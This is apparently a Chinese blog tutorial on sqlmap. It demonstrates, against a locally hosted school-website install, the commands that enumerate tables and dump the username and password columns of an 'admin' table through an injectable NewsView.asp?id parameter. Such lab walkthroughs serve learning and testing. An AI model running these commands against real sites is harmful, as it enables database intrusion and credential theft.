Sqlmap简单注入（access数据库）教程

什么是SQLMap?

SqlMap是一个开放源码的渗透测试工具，它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强大的检测引擎，最终渗透测试和广泛的从数据库中的指纹持久的开关，从数据库中提取数据，访问底层的文件系统和操作系统执行命令的许多利基功能带外连接。
项目网站：http://sqlmap.sourceforge.net/
支持的数据库：MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB，几乎囊括了市面上所有的数据库
对于Sqlmap的强悍，用过了才知道
下面通过一个简单的实例演示：
测试环境：Backtrack 5&windows7(x64)sqlmap/1.0-dev(r4405)
本打算用windows2003下的iis环境，可惜电脑配置跑不动两个虚拟机，直接在本机win7下用小旋风搭建iis，虚拟机开Backtrack 5跑sqlmap.

我这里用的是”校无忧学校网站 ”源码，

注入点的查找不多说，这里找到一个：http://192.168.121.1/NewsView.asp?id=8
我这里只获得列名，表名，和内容.Backtrack 5运行我们的Sqlmap神器,
输入命令：python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –tables

是否列表名，选Y

设置线程，我这里设置8

只需要一分钟不到，表段就爆出来了

下面爆字段，输入命令：

python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 --columns -T "admin"

查看admin表所在的列名

速度一样飞快

获取内容

python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 --dump -C “username,password” -T “admin”

这只是Sqlmap功能的九牛一毛，若想深入了解，推荐阅读Sqlmap说明文件。